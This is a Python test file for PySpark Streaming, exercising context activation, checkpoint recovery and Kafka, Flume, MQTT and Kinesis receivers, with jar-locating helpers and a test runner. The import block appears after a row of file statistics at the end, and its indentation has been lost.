        # Verify that getActive() returns None
        self.ssc.stop(False)
        self.assertEqual(StreamingContext.getActive(), None)
        # Verify that if the Java context is stopped, then getActive() returns None
        self.ssc = StreamingContext(self.sc, self.duration)
        self.ssc.queueStream([[1]]).foreachRDD(lambda rdd: rdd.count())
        self.ssc.start()
        self.assertEqual(StreamingContext.getActive(), self.ssc)
        self.ssc._jssc.stop(False)
        self.assertEqual(StreamingContext.getActive(), None)
    def test_get_active_or_create(self):
        """getActiveOrCreate() calls setupFunc only when no context is active."""
        # Test StreamingContext.getActiveOrCreate() without checkpoint data
        # See CheckpointTests for tests with checkpoint data
        self.ssc = None
        self.assertEqual(StreamingContext.getActive(), None)
        def setupFunc():
            ssc = StreamingContext(self.sc, self.duration)
            ssc.queueStream([[1]]).foreachRDD(lambda rdd: rdd.count())
            self.setupCalled = True
            return ssc
        # Verify that getActiveOrCreate() (w/o checkpoint) calls setupFunc when no context is active
        self.setupCalled = False
        self.ssc = StreamingContext.getActiveOrCreate(None, setupFunc)
        self.assertTrue(self.setupCalled)
        # Verify that getActiveOrCreate() returns active context and does not call the setupFunc
        self.ssc.start()
        self.setupCalled = False
        self.assertEqual(StreamingContext.getActiveOrCreate(None, setupFunc), self.ssc)
        self.assertFalse(self.setupCalled)
        # Verify that getActiveOrCreate() calls setupFunc after active context is stopped
        self.ssc.stop(False)
        self.setupCalled = False
        self.ssc = StreamingContext.getActiveOrCreate(None, setupFunc)
        self.assertTrue(self.setupCalled)
        # Verify that if the Java context is stopped, then getActive() returns None
        self.ssc = StreamingContext(self.sc, self.duration)
        self.ssc.queueStream([[1]]).foreachRDD(lambda rdd: rdd.count())
        self.ssc.start()
        self.assertEqual(StreamingContext.getActive(), self.ssc)
        self.ssc._jssc.stop(False)
        self.setupCalled = False
        self.ssc = StreamingContext.getActiveOrCreate(None, setupFunc)
        self.assertTrue(self.setupCalled)
class CheckpointTests(unittest.TestCase):
    """Tests checkpoint-based recovery via getOrCreate()/getActiveOrCreate().

    Unlike the other suites this one manages its own SparkContext, because
    recovery from a checkpoint must be able to create a fresh context.
    """
    setupCalled = False  # flipped by the setup() closure to observe (non-)invocation
    @staticmethod
    def tearDownClass():
        # Clean up in the JVM just in case there has been some issues in Python API
        jStreamingContextOption = StreamingContext._jvm.SparkContext.getActive()
        if jStreamingContextOption.nonEmpty():
            jStreamingContextOption.get().stop()
        jSparkContextOption = SparkContext._jvm.SparkContext.get()
        if jSparkContextOption.nonEmpty():
            jSparkContextOption.get().stop()
    def setUp(self):
        # BUG FIX: initialize the attributes tearDown() reads, so a failure
        # early in a test does not turn into an AttributeError during cleanup.
        self.ssc = None
        self.sc = None
        self.cpd = None
    def tearDown(self):
        if self.ssc is not None:
            self.ssc.stop(True)
        if self.sc is not None:
            self.sc.stop()
        if self.cpd is not None:
            shutil.rmtree(self.cpd)
    def test_get_or_create_and_get_active_or_create(self):
        """End-to-end word-count with checkpointing, stopped and recovered repeatedly."""
        inputd = tempfile.mkdtemp()
        outputd = tempfile.mkdtemp() + "/"
        def updater(vs, s):
            # Running sum of counts per key; state is None on first sight.
            return sum(vs, s or 0)
        def setup():
            conf = SparkConf().set("spark.default.parallelism", 1)
            sc = SparkContext(conf=conf)
            ssc = StreamingContext(sc, 0.5)
            dstream = ssc.textFileStream(inputd).map(lambda x: (x, 1))
            wc = dstream.updateStateByKey(updater)
            wc.map(lambda x: "%s,%d" % x).saveAsTextFiles(outputd + "test")
            wc.checkpoint(.5)
            self.setupCalled = True
            return ssc
        # Verify that getOrCreate() calls setup() in absence of checkpoint files
        self.cpd = tempfile.mkdtemp("test_streaming_cps")
        self.setupCalled = False
        self.ssc = StreamingContext.getOrCreate(self.cpd, setup)
        # BUG FIX: with a fresh checkpoint dir setup() MUST have been called;
        # the original asserted the opposite (assertFalse), contradicting the
        # comment above.
        self.assertTrue(self.setupCalled)
        self.ssc.start()
        def check_output(n):
            """Write batch n to the input dir and wait until its output appears."""
            while not os.listdir(outputd):
                time.sleep(0.01)
            time.sleep(1)  # make sure mtime is larger than the previous one
            with open(os.path.join(inputd, str(n)), 'w') as f:
                f.writelines(["%d\n" % i for i in range(10)])
            while True:
                p = os.path.join(outputd, max(os.listdir(outputd)))
                if '_SUCCESS' not in os.listdir(p):
                    # not finished
                    time.sleep(0.01)
                    continue
                ordd = self.ssc.sparkContext.textFile(p).map(lambda line: line.split(","))
                d = ordd.values().map(int).collect()
                if not d:
                    time.sleep(0.01)
                    continue
                self.assertEqual(10, len(d))
                s = set(d)
                self.assertEqual(1, len(s))
                m = s.pop()
                if n > m:
                    # Output is from an older batch; keep waiting.
                    continue
                self.assertEqual(n, m)
                break
        check_output(1)
        check_output(2)
        # Verify the getOrCreate() recovers from checkpoint files
        self.ssc.stop(True, True)
        time.sleep(1)
        self.setupCalled = False
        self.ssc = StreamingContext.getOrCreate(self.cpd, setup)
        self.assertFalse(self.setupCalled)
        self.ssc.start()
        check_output(3)
        # Verify that getOrCreate() uses existing SparkContext
        self.ssc.stop(True, True)
        time.sleep(1)
        sc = SparkContext(SparkConf())
        self.setupCalled = False
        self.ssc = StreamingContext.getOrCreate(self.cpd, setup)
        self.assertFalse(self.setupCalled)
        self.assertTrue(self.ssc.sparkContext == sc)
        # Verify the getActiveOrCreate() recovers from checkpoint files
        self.ssc.stop(True, True)
        time.sleep(1)
        self.setupCalled = False
        self.ssc = StreamingContext.getActiveOrCreate(self.cpd, setup)
        self.assertFalse(self.setupCalled)
        self.ssc.start()
        check_output(4)
        # Verify that getActiveOrCreate() returns active context
        self.setupCalled = False
        self.assertEqual(StreamingContext.getActiveOrCreate(self.cpd, setup), self.ssc)
        self.assertFalse(self.setupCalled)
        # Verify that getActiveOrCreate() uses existing SparkContext
        self.ssc.stop(True, True)
        time.sleep(1)
        self.sc = SparkContext(SparkConf())
        self.setupCalled = False
        self.ssc = StreamingContext.getActiveOrCreate(self.cpd, setup)
        self.assertFalse(self.setupCalled)
        # BUG FIX: compare against the SparkContext created just above (self.sc);
        # the original compared against the earlier local `sc`, which was
        # already stopped by the preceding self.ssc.stop(True, True).
        self.assertTrue(self.ssc.sparkContext == self.sc)
        # Verify that getActiveOrCreate() calls setup() in absence of checkpoint files
        self.ssc.stop(True, True)
        shutil.rmtree(self.cpd)  # delete checkpoint directory
        time.sleep(1)
        self.setupCalled = False
        self.ssc = StreamingContext.getActiveOrCreate(self.cpd, setup)
        self.assertTrue(self.setupCalled)
        # Stop everything
        self.ssc.stop(True, True)
class KafkaStreamTests(PySparkStreamingTestCase):
    """Integration tests for the Kafka receiver-based and direct stream APIs.

    Each test spins up an embedded Kafka broker through the JVM-side
    KafkaTestUtils helper loaded in setUp().
    """
    timeout = 20  # seconds
    duration = 1
    def setUp(self):
        """Load and start the JVM-side KafkaTestUtils helper."""
        super(KafkaStreamTests, self).setUp()
        kafkaTestUtilsClz = self.ssc._jvm.java.lang.Thread.currentThread().getContextClassLoader()\
            .loadClass("org.apache.spark.streaming.kafka.KafkaTestUtils")
        self._kafkaTestUtils = kafkaTestUtilsClz.newInstance()
        self._kafkaTestUtils.setup()
    def tearDown(self):
        """Shut down the embedded broker before the base class stops the context."""
        if self._kafkaTestUtils is not None:
            self._kafkaTestUtils.teardown()
            self._kafkaTestUtils = None
        super(KafkaStreamTests, self).tearDown()
    def _randomTopic(self):
        """Return a random topic name so test runs do not interfere."""
        return "topic-%d" % random.randint(0, 10000)
    def _validateStreamResult(self, sendData, stream):
        """Collect message bodies from the stream and compare counts to sendData."""
        result = {}
        for i in chain.from_iterable(self._collect(stream.map(lambda x: x[1]),
                                                   sum(sendData.values()))):
            result[i] = result.get(i, 0) + 1
        self.assertEqual(sendData, result)
    def _validateRddResult(self, sendData, rdd):
        """Collect message bodies from the RDD and compare counts to sendData."""
        result = {}
        for i in rdd.map(lambda x: x[1]).collect():
            result[i] = result.get(i, 0) + 1
        self.assertEqual(sendData, result)
    def test_kafka_stream(self):
        """Test the Python Kafka stream API."""
        topic = self._randomTopic()
        sendData = {"a": 3, "b": 5, "c": 10}
        self._kafkaTestUtils.createTopic(topic)
        self._kafkaTestUtils.sendMessages(topic, sendData)
        stream = KafkaUtils.createStream(self.ssc, self._kafkaTestUtils.zkAddress(),
                                         "test-streaming-consumer", {topic: 1},
                                         {"auto.offset.reset": "smallest"})
        self._validateStreamResult(sendData, stream)
    def test_kafka_direct_stream(self):
        """Test the Python direct Kafka stream API."""
        topic = self._randomTopic()
        sendData = {"a": 1, "b": 2, "c": 3}
        kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress(),
                       "auto.offset.reset": "smallest"}
        self._kafkaTestUtils.createTopic(topic)
        self._kafkaTestUtils.sendMessages(topic, sendData)
        stream = KafkaUtils.createDirectStream(self.ssc, [topic], kafkaParams)
        self._validateStreamResult(sendData, stream)
    @unittest.skipIf(sys.version >= "3", "long type not support")
    def test_kafka_direct_stream_from_offset(self):
        """Test the Python direct Kafka stream API with start offset specified."""
        topic = self._randomTopic()
        sendData = {"a": 1, "b": 2, "c": 3}
        fromOffsets = {TopicAndPartition(topic, 0): long(0)}
        kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress()}
        self._kafkaTestUtils.createTopic(topic)
        self._kafkaTestUtils.sendMessages(topic, sendData)
        stream = KafkaUtils.createDirectStream(self.ssc, [topic], kafkaParams, fromOffsets)
        self._validateStreamResult(sendData, stream)
    @unittest.skipIf(sys.version >= "3", "long type not support")
    def test_kafka_rdd(self):
        """Test the Python direct Kafka RDD API."""
        topic = self._randomTopic()
        sendData = {"a": 1, "b": 2}
        offsetRanges = [OffsetRange(topic, 0, long(0), long(sum(sendData.values())))]
        kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress()}
        self._kafkaTestUtils.createTopic(topic)
        self._kafkaTestUtils.sendMessages(topic, sendData)
        rdd = KafkaUtils.createRDD(self.sc, kafkaParams, offsetRanges)
        self._validateRddResult(sendData, rdd)
    @unittest.skipIf(sys.version >= "3", "long type not support")
    def test_kafka_rdd_with_leaders(self):
        """Test the Python direct Kafka RDD API with leaders."""
        topic = self._randomTopic()
        sendData = {"a": 1, "b": 2, "c": 3}
        offsetRanges = [OffsetRange(topic, 0, long(0), long(sum(sendData.values())))]
        kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress()}
        address = self._kafkaTestUtils.brokerAddress().split(":")
        leaders = {TopicAndPartition(topic, 0): Broker(address[0], int(address[1]))}
        self._kafkaTestUtils.createTopic(topic)
        self._kafkaTestUtils.sendMessages(topic, sendData)
        rdd = KafkaUtils.createRDD(self.sc, kafkaParams, offsetRanges, leaders)
        self._validateRddResult(sendData, rdd)
    @unittest.skipIf(sys.version >= "3", "long type not support")
    def test_kafka_rdd_get_offsetRanges(self):
        """Test Python direct Kafka RDD get OffsetRanges."""
        topic = self._randomTopic()
        sendData = {"a": 3, "b": 4, "c": 5}
        offsetRanges = [OffsetRange(topic, 0, long(0), long(sum(sendData.values())))]
        kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress()}
        self._kafkaTestUtils.createTopic(topic)
        self._kafkaTestUtils.sendMessages(topic, sendData)
        rdd = KafkaUtils.createRDD(self.sc, kafkaParams, offsetRanges)
        self.assertEqual(offsetRanges, rdd.offsetRanges())
    @unittest.skipIf(sys.version >= "3", "long type not support")
    def test_kafka_direct_stream_foreach_get_offsetRanges(self):
        """Test the Python direct Kafka stream foreachRDD get offsetRanges."""
        topic = self._randomTopic()
        sendData = {"a": 1, "b": 2, "c": 3}
        kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress(),
                       "auto.offset.reset": "smallest"}
        self._kafkaTestUtils.createTopic(topic)
        self._kafkaTestUtils.sendMessages(topic, sendData)
        stream = KafkaUtils.createDirectStream(self.ssc, [topic], kafkaParams)
        offsetRanges = []
        def getOffsetRanges(_, rdd):
            for o in rdd.offsetRanges():
                offsetRanges.append(o)
        stream.foreachRDD(getOffsetRanges)
        self.ssc.start()
        self.wait_for(offsetRanges, 1)
        self.assertEqual(offsetRanges, [OffsetRange(topic, 0, long(0), long(6))])
    @unittest.skipIf(sys.version >= "3", "long type not support")
    def test_kafka_direct_stream_transform_get_offsetRanges(self):
        """Test the Python direct Kafka stream transform get offsetRanges."""
        topic = self._randomTopic()
        sendData = {"a": 1, "b": 2, "c": 3}
        kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress(),
                       "auto.offset.reset": "smallest"}
        self._kafkaTestUtils.createTopic(topic)
        self._kafkaTestUtils.sendMessages(topic, sendData)
        stream = KafkaUtils.createDirectStream(self.ssc, [topic], kafkaParams)
        offsetRanges = []
        def transformWithOffsetRanges(rdd):
            for o in rdd.offsetRanges():
                offsetRanges.append(o)
            return rdd
        # Test whether it is ok mixing KafkaTransformedDStream and TransformedDStream together,
        # only the TransformedDstreams can be folded together.
        stream.transform(transformWithOffsetRanges).map(lambda kv: kv[1]).count().pprint()
        self.ssc.start()
        self.wait_for(offsetRanges, 1)
        self.assertEqual(offsetRanges, [OffsetRange(topic, 0, long(0), long(6))])
    def test_topic_and_partition_equality(self):
        """TopicAndPartition equality must consider both topic and partition."""
        topic_and_partition_a = TopicAndPartition("foo", 0)
        topic_and_partition_b = TopicAndPartition("foo", 0)
        topic_and_partition_c = TopicAndPartition("bar", 0)
        topic_and_partition_d = TopicAndPartition("foo", 1)
        self.assertEqual(topic_and_partition_a, topic_and_partition_b)
        self.assertNotEqual(topic_and_partition_a, topic_and_partition_c)
        self.assertNotEqual(topic_and_partition_a, topic_and_partition_d)
class FlumeStreamTests(PySparkStreamingTestCase):
    """Integration tests for the push-based Flume receiver (FlumeUtils.createStream)."""
    timeout = 20  # seconds
    duration = 1
    def setUp(self):
        """Load the JVM-side FlumeTestUtils helper via the context class loader."""
        super(FlumeStreamTests, self).setUp()
        utilsClz = self.ssc._jvm.java.lang.Thread.currentThread().getContextClassLoader() \
            .loadClass("org.apache.spark.streaming.flume.FlumeTestUtils")
        self._utils = utilsClz.newInstance()
    def tearDown(self):
        """Close the JVM helper before the base class stops the context."""
        if self._utils is not None:
            self._utils.close()
            self._utils = None
        super(FlumeStreamTests, self).tearDown()
    def _startContext(self, n, compressed):
        # Start the StreamingContext and also collect the result
        dstream = FlumeUtils.createStream(self.ssc, "localhost", self._utils.getTestPort(),
                                          enableDecompression=compressed)
        result = []
        def get_output(_, rdd):
            for event in rdd.collect():
                # Cap collection at n events; extras from late batches are dropped.
                if len(result) < n:
                    result.append(event)
        dstream.foreachRDD(get_output)
        self.ssc.start()
        return result
    def _validateResult(self, input, result):
        # Validate both the header and the body
        header = {"test": "header"}
        self.assertEqual(len(input), len(result))
        for i in range(0, len(input)):
            self.assertEqual(header, result[i][0])
            self.assertEqual(input[i], result[i][1])
    def _writeInput(self, input, compressed):
        # Try to write input to the receiver until success or timeout
        start_time = time.time()
        while True:
            try:
                self._utils.writeInput(input, compressed)
                break
            except:
                # The receiver may not be listening yet; retry until timeout.
                if time.time() - start_time < self.timeout:
                    time.sleep(0.01)
                else:
                    raise
    def test_flume_stream(self):
        """Receive 100 uncompressed events and validate headers and bodies."""
        input = [str(i) for i in range(1, 101)]
        result = self._startContext(len(input), False)
        self._writeInput(input, False)
        self.wait_for(result, len(input))
        self._validateResult(input, result)
    def test_compressed_flume_stream(self):
        """Same as test_flume_stream but with compression enabled."""
        input = [str(i) for i in range(1, 101)]
        result = self._startContext(len(input), True)
        self._writeInput(input, True)
        self.wait_for(result, len(input))
        self._validateResult(input, result)
class FlumePollingStreamTests(PySparkStreamingTestCase):
    """Integration tests for the pull-based Flume receiver (FlumeUtils.createPollingStream)."""
    timeout = 20  # seconds
    duration = 1
    maxAttempts = 5  # each scenario is retried this many times before failing
    def setUp(self):
        # NOTE: deliberately does not call super().setUp() -- each scenario
        # builds its own StreamingContext inside _writeAndVerify().
        utilsClz = \
            self.sc._jvm.java.lang.Thread.currentThread().getContextClassLoader() \
                .loadClass("org.apache.spark.streaming.flume.PollingFlumeTestUtils")
        self._utils = utilsClz.newInstance()
    def tearDown(self):
        """Close the JVM helper (no per-test ssc exists in this suite)."""
        if self._utils is not None:
            self._utils.close()
            self._utils = None
    def _writeAndVerify(self, ports):
        # Set up the streaming context and input streams
        ssc = StreamingContext(self.sc, self.duration)
        try:
            addresses = [("localhost", port) for port in ports]
            dstream = FlumeUtils.createPollingStream(
                ssc,
                addresses,
                maxBatchSize=self._utils.eventsPerBatch(),
                parallelism=5)
            outputBuffer = []
            def get_output(_, rdd):
                for e in rdd.collect():
                    outputBuffer.append(e)
            dstream.foreachRDD(get_output)
            ssc.start()
            self._utils.sendDatAndEnsureAllDataHasBeenReceived()
            self.wait_for(outputBuffer, self._utils.getTotalEvents())
            outputHeaders = [event[0] for event in outputBuffer]
            outputBodies = [event[1] for event in outputBuffer]
            # Validation of the received events happens on the JVM side.
            self._utils.assertOutput(outputHeaders, outputBodies)
        finally:
            ssc.stop(False)
    def _testMultipleTimes(self, f):
        """Run f(), retrying on any failure up to maxAttempts times."""
        attempt = 0
        while True:
            try:
                f()
                break
            except:
                # Broad catch is intentional here: these scenarios are
                # environment-sensitive; re-raise once attempts are exhausted.
                attempt += 1
                if attempt >= self.maxAttempts:
                    raise
                else:
                    import traceback
                    traceback.print_exc()
    def _testFlumePolling(self):
        try:
            port = self._utils.startSingleSink()
            self._writeAndVerify([port])
            self._utils.assertChannelsAreEmpty()
        finally:
            self._utils.close()
    def _testFlumePollingMultipleHosts(self):
        # NOTE(review): currently identical to _testFlumePolling (single sink);
        # confirm whether a true multi-sink setup was intended here.
        try:
            port = self._utils.startSingleSink()
            self._writeAndVerify([port])
            self._utils.assertChannelsAreEmpty()
        finally:
            self._utils.close()
    def test_flume_polling(self):
        self._testMultipleTimes(self._testFlumePolling)
    def test_flume_polling_multiple_hosts(self):
        self._testMultipleTimes(self._testFlumePollingMultipleHosts)
class MQTTStreamTests(PySparkStreamingTestCase):
    """Integration tests for the MQTT receiver (MQTTUtils.createStream)."""
    timeout = 20  # seconds
    duration = 1
    def setUp(self):
        """Load and start the JVM-side MQTTTestUtils broker helper."""
        super(MQTTStreamTests, self).setUp()
        MQTTTestUtilsClz = self.ssc._jvm.java.lang.Thread.currentThread().getContextClassLoader() \
            .loadClass("org.apache.spark.streaming.mqtt.MQTTTestUtils")
        self._MQTTTestUtils = MQTTTestUtilsClz.newInstance()
        self._MQTTTestUtils.setup()
    def tearDown(self):
        """Tear down the broker helper before the base class stops the context."""
        if self._MQTTTestUtils is not None:
            self._MQTTTestUtils.teardown()
            self._MQTTTestUtils = None
        super(MQTTStreamTests, self).tearDown()
    def _randomTopic(self):
        """Return a random topic name so test runs do not interfere."""
        return "topic-%d" % random.randint(0, 10000)
    def _startContext(self, topic):
        # Start the StreamingContext and also collect the result
        stream = MQTTUtils.createStream(self.ssc, "tcp://" + self._MQTTTestUtils.brokerUri(), topic)
        result = []
        def getOutput(_, rdd):
            for data in rdd.collect():
                result.append(data)
        stream.foreachRDD(getOutput)
        self.ssc.start()
        return result
    def test_mqtt_stream(self):
        """Test the Python MQTT stream API."""
        sendData = "MQTT demo for spark streaming"
        topic = self._randomTopic()
        result = self._startContext(topic)
        def retry():
            self._MQTTTestUtils.publishData(topic, sendData)
            # Because "publishData" sends duplicate messages, here we should use > 0
            self.assertTrue(len(result) > 0)
            self.assertEqual(sendData, result[0])
        # Retry it because we don't know when the receiver will start.
        self._retry_or_timeout(retry)
    def _retry_or_timeout(self, test_func):
        """Re-run test_func until it passes or self.timeout seconds elapse."""
        start_time = time.time()
        while True:
            try:
                test_func()
                break
            except:
                # Swallow and retry; re-raise the last failure once out of time.
                if time.time() - start_time > self.timeout:
                    raise
                time.sleep(0.01)
class KinesisStreamTests(PySparkStreamingTestCase):
    """Tests for the Kinesis stream API; the end-to-end test is opt-in via env var."""
    def test_kinesis_stream_api(self):
        # Don't start the StreamingContext because we cannot test it in Jenkins
        # (this only checks that both createStream signatures are accepted).
        kinesisStream1 = KinesisUtils.createStream(
            self.ssc, "myAppNam", "mySparkStream",
            "https://kinesis.us-west-2.amazonaws.com", "us-west-2",
            InitialPositionInStream.LATEST, 2, StorageLevel.MEMORY_AND_DISK_2)
        kinesisStream2 = KinesisUtils.createStream(
            self.ssc, "myAppNam", "mySparkStream",
            "https://kinesis.us-west-2.amazonaws.com", "us-west-2",
            InitialPositionInStream.LATEST, 2, StorageLevel.MEMORY_AND_DISK_2,
            "awsAccessKey", "awsSecretKey")
    def test_kinesis_stream(self):
        """End-to-end Kinesis test: pushes data to AWS and reads it back."""
        if not are_kinesis_tests_enabled:
            # BUG FIX: the skip message was missing its closing parenthesis
            # and a trailing newline.
            sys.stderr.write(
                "Skipped test_kinesis_stream (enable by setting environment variable %s=1)\n"
                % kinesis_test_environ_var)
            return
        import random
        kinesisAppName = ("KinesisStreamTests-%d" % abs(random.randint(0, 10000000)))
        kinesisTestUtilsClz = \
            self.sc._jvm.java.lang.Thread.currentThread().getContextClassLoader() \
                .loadClass("org.apache.spark.streaming.kinesis.KinesisTestUtils")
        kinesisTestUtils = kinesisTestUtilsClz.newInstance()
        try:
            kinesisTestUtils.createStream()
            aWSCredentials = kinesisTestUtils.getAWSCredentials()
            stream = KinesisUtils.createStream(
                self.ssc, kinesisAppName, kinesisTestUtils.streamName(),
                kinesisTestUtils.endpointUrl(), kinesisTestUtils.regionName(),
                InitialPositionInStream.LATEST, 10, StorageLevel.MEMORY_ONLY,
                aWSCredentials.getAWSAccessKeyId(), aWSCredentials.getAWSSecretKey())
            outputBuffer = []
            def get_output(_, rdd):
                for e in rdd.collect():
                    outputBuffer.append(e)
            stream.foreachRDD(get_output)
            self.ssc.start()
            testData = [i for i in range(1, 11)]
            expectedOutput = set([str(i) for i in testData])
            start_time = time.time()
            # Keep re-pushing until everything comes back or 120s elapse
            # (receiving is slow to start against real AWS).
            while time.time() - start_time < 120:
                kinesisTestUtils.pushData(testData)
                if expectedOutput == set(outputBuffer):
                    break
                time.sleep(10)
            self.assertEqual(expectedOutput, set(outputBuffer))
        except:
            import traceback
            traceback.print_exc()
            raise
        finally:
            # Always clean up the AWS-side stream and DynamoDB lease table.
            self.ssc.stop(False)
            kinesisTestUtils.deleteStream()
            kinesisTestUtils.deleteDynamoDBTable(kinesisAppName)
# Search jar in the project dir using the jar name_prefix for both sbt build and maven build because
# the artifact jars are in different directories.
def search_jar(dir, name_prefix):
    """Return candidate assembly jars under `dir` matching `name_prefix`.

    Looks in both the sbt layout (target/scala-*/<prefix>-*.jar) and the
    maven layout (target/<prefix>_*.jar), excluding doc/source/test jars.
    """
    # We should ignore the following jars
    ignored_jar_suffixes = ("javadoc.jar", "sources.jar", "test-sources.jar", "tests.jar")
    sbt_jars = glob.glob(os.path.join(dir, "target/scala-*/" + name_prefix + "-*.jar"))
    maven_jars = glob.glob(os.path.join(dir, "target/" + name_prefix + "_*.jar"))
    return [jar for jar in sbt_jars + maven_jars if not jar.endswith(ignored_jar_suffixes)]
def search_kafka_assembly_jar():
    """Locate the single spark-streaming-kafka assembly jar under SPARK_HOME.

    Raises Exception when the jar is missing or when multiple copies exist.
    """
    SPARK_HOME = os.environ["SPARK_HOME"]
    kafka_assembly_dir = os.path.join(SPARK_HOME, "external/kafka-assembly")
    jars = search_jar(kafka_assembly_dir, "spark-streaming-kafka-assembly")
    if len(jars) == 1:
        return jars[0]
    if not jars:
        raise Exception(
            ("Failed to find Spark Streaming kafka assembly jar in %s. " % kafka_assembly_dir) +
            "You need to build Spark with "
            "'build/sbt assembly/assembly streaming-kafka-assembly/assembly' or "
            "'build/mvn package' before running this test.")
    raise Exception(("Found multiple Spark Streaming Kafka assembly JARs: %s; please "
                     "remove all but one") % (", ".join(jars)))
def search_flume_assembly_jar():
    """Locate the single spark-streaming-flume assembly jar under SPARK_HOME.

    Raises Exception when the jar is missing or when multiple copies exist.
    """
    SPARK_HOME = os.environ["SPARK_HOME"]
    flume_assembly_dir = os.path.join(SPARK_HOME, "external/flume-assembly")
    jars = search_jar(flume_assembly_dir, "spark-streaming-flume-assembly")
    if len(jars) == 1:
        return jars[0]
    if not jars:
        raise Exception(
            ("Failed to find Spark Streaming Flume assembly jar in %s. " % flume_assembly_dir) +
            "You need to build Spark with "
            "'build/sbt assembly/assembly streaming-flume-assembly/assembly' or "
            "'build/mvn package' before running this test.")
    raise Exception(("Found multiple Spark Streaming Flume assembly JARs: %s; please "
                     "remove all but one") % (", ".join(jars)))
def search_mqtt_assembly_jar():
    """Locate the single spark-streaming-mqtt assembly jar under SPARK_HOME.

    Raises Exception when the jar is missing or when multiple copies exist.
    """
    SPARK_HOME = os.environ["SPARK_HOME"]
    mqtt_assembly_dir = os.path.join(SPARK_HOME, "external/mqtt-assembly")
    jars = search_jar(mqtt_assembly_dir, "spark-streaming-mqtt-assembly")
    if not jars:
        raise Exception(
            ("Failed to find Spark Streaming MQTT assembly jar in %s. " % mqtt_assembly_dir) +
            "You need to build Spark with "
            "'build/sbt assembly/assembly streaming-mqtt-assembly/assembly' or "
            # FIX: added the missing trailing period for consistency with the
            # sibling search_*_assembly_jar error messages.
            "'build/mvn package' before running this test.")
    elif len(jars) > 1:
        raise Exception(("Found multiple Spark Streaming MQTT assembly JARs: %s; please "
                         "remove all but one") % (", ".join(jars)))
    else:
        return jars[0]
def search_mqtt_test_jar():
    """Locate the sbt-built spark-streaming-mqtt test jar under SPARK_HOME.

    Raises Exception when the jar is missing or when multiple copies exist.
    """
    SPARK_HOME = os.environ["SPARK_HOME"]
    mqtt_test_dir = os.path.join(SPARK_HOME, "external/mqtt")
    jars = glob.glob(
        os.path.join(mqtt_test_dir, "target/scala-*/spark-streaming-mqtt-test-*.jar"))
    if len(jars) == 1:
        return jars[0]
    if not jars:
        raise Exception(
            ("Failed to find Spark Streaming MQTT test jar in %s. " % mqtt_test_dir) +
            "You need to build Spark with "
            "'build/sbt assembly/assembly streaming-mqtt/test:assembly'")
    raise Exception(("Found multiple Spark Streaming MQTT test JARs: %s; please "
                     "remove all but one") % (", ".join(jars)))
def search_kinesis_asl_assembly_jar():
    """Locate the optional Kinesis ASL assembly jar, or None when not built.

    Unlike the other search_* helpers, a missing jar is not an error here,
    because Kinesis support is optional.
    """
    SPARK_HOME = os.environ["SPARK_HOME"]
    kinesis_asl_assembly_dir = os.path.join(SPARK_HOME, "extras/kinesis-asl-assembly")
    jars = search_jar(kinesis_asl_assembly_dir, "spark-streaming-kinesis-asl-assembly")
    if len(jars) > 1:
        raise Exception(("Found multiple Spark Streaming Kinesis ASL assembly JARs: %s; please "
                         "remove all but one") % (", ".join(jars)))
    return jars[0] if jars else None
# Must be same as the variable and condition defined in KinesisTestUtils.scala
kinesis_test_environ_var = "ENABLE_KINESIS_TESTS"
# The end-to-end Kinesis test talks to real AWS, so it only runs when opted in.
are_kinesis_tests_enabled = os.environ.get(kinesis_test_environ_var) == '1'
if __name__ == "__main__":
    # Locate every external assembly jar the streaming tests need and hand
    # them to spark-submit through PYSPARK_SUBMIT_ARGS.
    kafka_assembly_jar = search_kafka_assembly_jar()
    flume_assembly_jar = search_flume_assembly_jar()
    mqtt_assembly_jar = search_mqtt_assembly_jar()
    mqtt_test_jar = search_mqtt_test_jar()
    kinesis_asl_assembly_jar = search_kinesis_asl_assembly_jar()
    if kinesis_asl_assembly_jar is None:
        kinesis_jar_present = False
        jars = "%s,%s,%s,%s" % (kafka_assembly_jar, flume_assembly_jar, mqtt_assembly_jar,
                                mqtt_test_jar)
    else:
        kinesis_jar_present = True
        jars = "%s,%s,%s,%s,%s" % (kafka_assembly_jar, flume_assembly_jar, mqtt_assembly_jar,
                                   mqtt_test_jar, kinesis_asl_assembly_jar)
    os.environ["PYSPARK_SUBMIT_ARGS"] = "--jars %s pyspark-shell" % jars
    testcases = [BasicOperationTests, WindowFunctionTests, StreamingContextTests, CheckpointTests,
                 KafkaStreamTests, FlumeStreamTests, FlumePollingStreamTests, MQTTStreamTests]
    if kinesis_jar_present is True:
        testcases.append(KinesisStreamTests)
    elif are_kinesis_tests_enabled is False:
        sys.stderr.write("Skipping all Kinesis Python tests as the optional Kinesis project was "
                         "not compiled into a JAR. To run these tests, "
                         "you need to build Spark with 'build/sbt -Pkinesis-asl assembly/assembly "
                         "streaming-kinesis-asl-assembly/assembly' or "
                         "'build/mvn -Pkinesis-asl package' before running this test.")
    else:
        # BUG FIX: the original referenced `kinesis_asl_assembly_dir` here, but
        # that name is local to search_kinesis_asl_assembly_jar(), so this error
        # path raised NameError instead of the intended Exception. Recompute the
        # directory for the message. Also fixed the missing space between the
        # concatenated message fragments ("...assembly'or 'build/mvn...").
        kinesis_asl_assembly_dir = os.path.join(os.environ["SPARK_HOME"],
                                                "extras/kinesis-asl-assembly")
        raise Exception(
            ("Failed to find Spark Streaming Kinesis assembly jar in %s. "
             % kinesis_asl_assembly_dir) +
            "You need to build Spark with 'build/sbt -Pkinesis-asl "
            "assembly/assembly streaming-kinesis-asl-assembly/assembly' "
            "or 'build/mvn -Pkinesis-asl package' before running this test.")
    sys.stderr.write("Running tests: %s \n" % (str(testcases)))
    for testcase in testcases:
        sys.stderr.write("[Running %s]\n" % (testcase))
        tests = unittest.TestLoader().loadTestsFromTestCase(testcase)
        if xmlrunner:
            # Emit JUnit-style XML reports when xmlrunner is installed (CI).
            unittest.main(tests, verbosity=3,
                          testRunner=xmlrunner.XMLTestRunner(output='target/test-reports'))
        else:
            unittest.TextTestRunner(verbosity=3).run(tests)
| 38.226998 | 100 | 0.592239 |
import glob
import os
import sys
from itertools import chain
import time
import operator
import tempfile
import random
import struct
import shutil
from functools import reduce
try:
import xmlrunner
except ImportError:
xmlrunner = None
